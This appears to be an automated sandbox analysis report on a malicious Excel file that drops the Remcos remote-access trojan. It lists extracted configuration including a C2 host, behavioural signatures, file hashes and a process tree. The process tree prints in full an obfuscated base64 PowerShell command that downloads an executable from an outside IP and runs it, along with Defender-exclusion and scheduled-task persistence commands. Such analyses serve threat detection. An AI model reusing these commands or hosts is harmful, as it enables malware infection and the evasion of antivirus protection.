Analysis

  • max time kernel
    148s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01-10-2024 19:32

General

  • Target

    TT12822024.xls

  • Size

    640KB

  • MD5

    3e23db29ce7cdc215bac52c531aed525

  • SHA1

    57286b0272df8386254ba0fbe340f0fba2cafbc8

  • SHA256

    2fc21f78d38708b2fd7d776780305ae303ec4277e41241462d4cf3f94a779d29

  • SHA512

    0dfe34dcf345a6d501ad6d20758b212f7c13af5181330fcdbad3598a748b155c811438bde78220efd26aa73ffe6273c639fea7d04ed2b7d32f1a58da43195843

  • SSDEEP

    12288:ECf1SLuA5XvOZWQNb7/Aiy/vyEzrFdIiC1smRaAVpwnzI613rQdq:zMxxvXQ5/ny/v9r4PKqczI6NMd

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

hiddenrmcnew.duckdns.org:7839

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-PW8G0U

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\TT12822024.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2068
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C POwErShell -EX bYpasS -Nop -w 1 -C DEvIcECreDeNtialDEPlOYmEnt.exE ; ieX($(Iex('[SYStEm.TeXt.enCOdINg]'+[CHAr]0X3A+[chAR]0x3A+'utF8.GetSTriNG([sYstEm.coNveRt]'+[chAR]0X3A+[ChAR]0x3a+'froMBase64StrinG('+[CHAr]34+'JHNzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUmRlRmlOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFaUXksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2pVd2NUYkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGtMLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFeWYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnBwZU9uKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHROTGNwZUVvQWNrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzczo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4xOS4xNzcuNDQvOTAvZGxsaG9zdC5leGUiLCIkZU5WOkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RBUnQtU0xFZVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[chAR]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2648
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        POwErShell -EX bYpasS -Nop -w 1 -C DEvIcECreDeNtialDEPlOYmEnt.exE ; ieX($(Iex('[SYStEm.TeXt.enCOdINg]'+[CHAr]0X3A+[chAR]0x3A+'utF8.GetSTriNG([sYstEm.coNveRt]'+[chAR]0X3A+[ChAR]0x3a+'froMBase64StrinG('+[CHAr]34+'JHNzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUmRlRmlOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFaUXksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2pVd2NUYkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGtMLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFeWYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnBwZU9uKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHROTGNwZUVvQWNrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzczo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNC4xOS4xNzcuNDQvOTAvZGxsaG9zdC5leGUiLCIkZU5WOkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RBUnQtU0xFZVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[chAR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2152
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\odotvkxq.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1456
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF1CF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF1CE.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:564
        • C:\Users\Admin\AppData\Roaming\dllhost.exe
          "C:\Users\Admin\AppData\Roaming\dllhost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1956
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\dllhost.exe"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2040
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ZukuCcvWAQW.exe"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:676
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZukuCcvWAQW" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3F22.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1764
          • C:\Users\Admin\AppData\Roaming\dllhost.exe
            "C:\Users\Admin\AppData\Roaming\dllhost.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2932

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    1KB

    MD5

    7fb5fa1534dcf77f2125b2403b30a0ee

    SHA1

    365d96812a69ac0a4611ea4b70a3f306576cc3ea

    SHA256

    33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

    SHA512

    a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    436B

    MD5

    971c514f84bba0785f80aa1c23edfd79

    SHA1

    732acea710a87530c6b08ecdf32a110d254a54c8

    SHA256

    f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

    SHA512

    43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

    Filesize

    174B

    MD5

    4b9e99deb59d3c4d346932f688d2a48e

    SHA1

    6d0dd7ca0871bae21f677750ef36b953793d2fe6

    SHA256

    ab7dcf3664db0206da58444023ca4b5557b4ec907f4eaa3b9b5d9c1c8337c549

    SHA512

    00ac18cd2aafbe3f9aa0ce503b069a374468df742e05c99bf06e414c4319db9892390e3aafe26ad05df745d406ab1cabe4cc63281a0eb480867e3a043ad2871d

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

    Filesize

    170B

    MD5

    404c33effede9c994c47dc846be908d9

    SHA1

    a06689b797fb8b3de52dd2f8c2a52ff416d87e4f

    SHA256

    547588f5c80208754198f2b825fb0a22d6eeb3107a68e221b7a6dc39a0455068

    SHA512

    270e4bef2899c14e82a56f000fd1c4def6e34d28299b54ae173207c94c88f73df7c233f296ac9572304c0288806f799efe9a9b54d4a35278fe7b63b5e7f03602

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\56KJ964X\IEnetsatwithnewthingstobeonline[1].hta

    Filesize

    8KB

    MD5

    d9ac57b5892373b3bedbfa2b40c7c0d2

    SHA1

    51293feca6b9ac5eeae0d2787ddcbb63ce42562e

    SHA256

    6c9ea8439a54ca2306b9e8c32b153db150b16c4cdb3e83a5fafb0b92c1c26318

    SHA512

    dda99fed1c86c9f232ddd9778e5107ec4d45885afd5ee528a3fb62c08898b40dab66c631fe46bce96a6f205ab9b12b0029c81ca510bc0cf4411cdcbb90a5e034

  • C:\Users\Admin\AppData\Local\Temp\CabE060.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESF1CF.tmp

    Filesize

    1KB

    MD5

    6c12efcedeafaa65a0b9de4284e8cb10

    SHA1

    a823577fdf3d687ea58748c779dacafe646a30b8

    SHA256

    d34ef74a0ab9d943fa999746ed3b0f7367464473078a8d6e96cdac91bb7cfa69

    SHA512

    50fb855d38c19f3f7238409c25e02b719337d77522e7cdf4cd103a09d27967c74e658f8b0bf30addaabd2603b3e50aed9800961f018d16facb221e0d57970c5b

  • C:\Users\Admin\AppData\Local\Temp\odotvkxq.dll

    Filesize

    3KB

    MD5

    af54043d8c4ec6d841f7d7bf1ae4affe

    SHA1

    bb9de3feeea033c158f61d0ebdf2ed960818cfcd

    SHA256

    dca829678e06b0e665720bbcd36f0336f79a5a340a662f57eb3f281c7b7981c7

    SHA512

    920ed59b8f88fc60ce20de3ee1b1177988c484dde35da732125ab28b049e696329e37405c688e10145f3e641d2da6aaeeb62ce95f82f3d0b83d0e82fad04c454

  • C:\Users\Admin\AppData\Local\Temp\odotvkxq.pdb

    Filesize

    7KB

    MD5

    d87bb4430bde8d39031bbacf990f76a5

    SHA1

    63728748176415b34c09afac75281abace3d042a

    SHA256

    24bd9c3ad41a456c4514bbdab58453083041f4ec430897423eb9fa38befd9d03

    SHA512

    fc2056066006fac2c67bdd7c4f8e1778ae1a8187e3562c29a0d6e9619cb332601b9579ef04f04a2953e65843e37aa817ffa2dfd4e5c7a6e964c5edf559988c27

  • C:\Users\Admin\AppData\Local\Temp\tmp3F22.tmp

    Filesize

    1KB

    MD5

    a687c18cef2d7b281862b95db5995e4b

    SHA1

    a134d8f47f39496e83d1cf548ef3cc76e6d41708

    SHA256

    581f9211a3f32a648dfbf9e2ada363beb38cb96b2ef5fba2a500f2cc9db31656

    SHA512

    8302aacb55f8e212e861ebc2513fd2a6933ddf931e6117a3cf2f89003a976e6cc1e6870eb51f72bdd079d68d1f5fa2e16d866a3b84b7e0bcdf37cdd17f64aded

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O5HRJIM0J4OO8LT8EE13.temp

    Filesize

    7KB

    MD5

    175d12703b97f0780e0a248392ce8eb0

    SHA1

    9ebe55d588ebfbc146dfafac5b623f5ae49dfba7

    SHA256

    d48b04adaf11bae2360ea4efb6530cba427d16926642cd5111266a2f0fe2d61a

    SHA512

    5a06c38d279ba2502ca4db0df80d11a5dda72b191ae79fcc8ed50e2049845f170bbfba2dd93f42f9031e11d1dc20c8b5841db511ab69a28a8294cc6afcae607d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    c589762b3788514e066baa29e1fc431f

    SHA1

    8ef6af54ce26a07d0e07682a75567e23ac72a939

    SHA256

    4785798ac5d7e4bfa82a0e9646dd95d264e65c504482d5b1fdf703915ddf571f

    SHA512

    7755bc377fbac3caee2bf701088e69c4d65bdef2085689e6d7b1f3480b5f7ff764293f8e166cf148580784c5f7f47cfc5939c93a5fd737422eba892b29026a61

  • C:\Users\Admin\AppData\Roaming\dllhost.exe

    Filesize

    1.0MB

    MD5

    06288ac34c34b1751dca19951d6140f8

    SHA1

    e3af412db4368c7a3c7b3a0a812c2af6903bb697

    SHA256

    156b1cea1a2f649e332be482047de3d368f5f7b7e93eb4821692ada17a69fc75

    SHA512

    47cd551807523783db43570df4d3ab4edb52699b8a118b91453c12aa5c5ca3b746a023ce6b5b0561754f876671136312b9aa725d6a8c5fec0ef004231caaf039

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCF1CE.tmp

    Filesize

    652B

    MD5

    1263f91b8146c8235ac028b2e9fa13b4

    SHA1

    e7128e73294daa755f4baf6f7fc0e56aaf6a64e9

    SHA256

    3d78be875a39c34faf0b99d8b3542b1f39b8428e267aee36ca48d2051ab45c9f

    SHA512

    126b9c3464b580183655836255986a3937e4aed3ad28d502790993ff66be86a78b6182ec0bd77e7f9214288c7c63b07a8196ac6e03b8f31e5b9844e7f275cd6b

  • \??\c:\Users\Admin\AppData\Local\Temp\odotvkxq.0.cs

    Filesize

    474B

    MD5

    05338ab0e37f31858e4a873718421680

    SHA1

    fadcc6745b125528cfd1679cdd99e393931c8b52

    SHA256

    22258adafef6f05af8039a4829b9c288f006485a0d1f7b96d5e47c1d7fb2d49c

    SHA512

    304591d6b3dcbba265285fd5719357327ebecbbdf3e18bc7c81db2046a355b0bfd2e68e64aa2160bc764fbfd68b5415c54eb8e7999ff4d875ec4987f6096f403

  • \??\c:\Users\Admin\AppData\Local\Temp\odotvkxq.cmdline

    Filesize

    309B

    MD5

    3d8ceba5569b3da815ad522628f916bb

    SHA1

    262242cd97fdb7d5540067469e1abcaff6c9b2da

    SHA256

    2ca3b292b4b6cfd4cc26eaafbf91d46ca141c3c9616bad683b1dde8f9ca2870b

    SHA512

    0212bf06f52b1a86f6b0adab64087b86b5fe0b13936bd2c0951b7fda3945d8f893f466d0a2dabb76489f83870358b5592ce78ea27ac19fe7c28cff8b022a4ec4

  • memory/1956-73-0x0000000005B70000-0x0000000005C30000-memory.dmp

    Filesize

    768KB

  • memory/1956-71-0x0000000000020000-0x0000000000124000-memory.dmp

    Filesize

    1.0MB

  • memory/1956-72-0x0000000000570000-0x000000000058E000-memory.dmp

    Filesize

    120KB

  • memory/2068-45-0x0000000071E7D000-0x0000000071E88000-memory.dmp

    Filesize

    44KB

  • memory/2068-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2068-17-0x0000000002450000-0x0000000002452000-memory.dmp

    Filesize

    8KB

  • memory/2068-1-0x0000000071E7D000-0x0000000071E88000-memory.dmp

    Filesize

    44KB

  • memory/2744-16-0x0000000000ED0000-0x0000000000ED2000-memory.dmp

    Filesize

    8KB

  • memory/2932-102-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-100-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-110-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-109-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-107-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-106-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2932-91-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-104-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-111-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-98-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-96-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-94-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-92-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-112-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-114-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2932-115-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB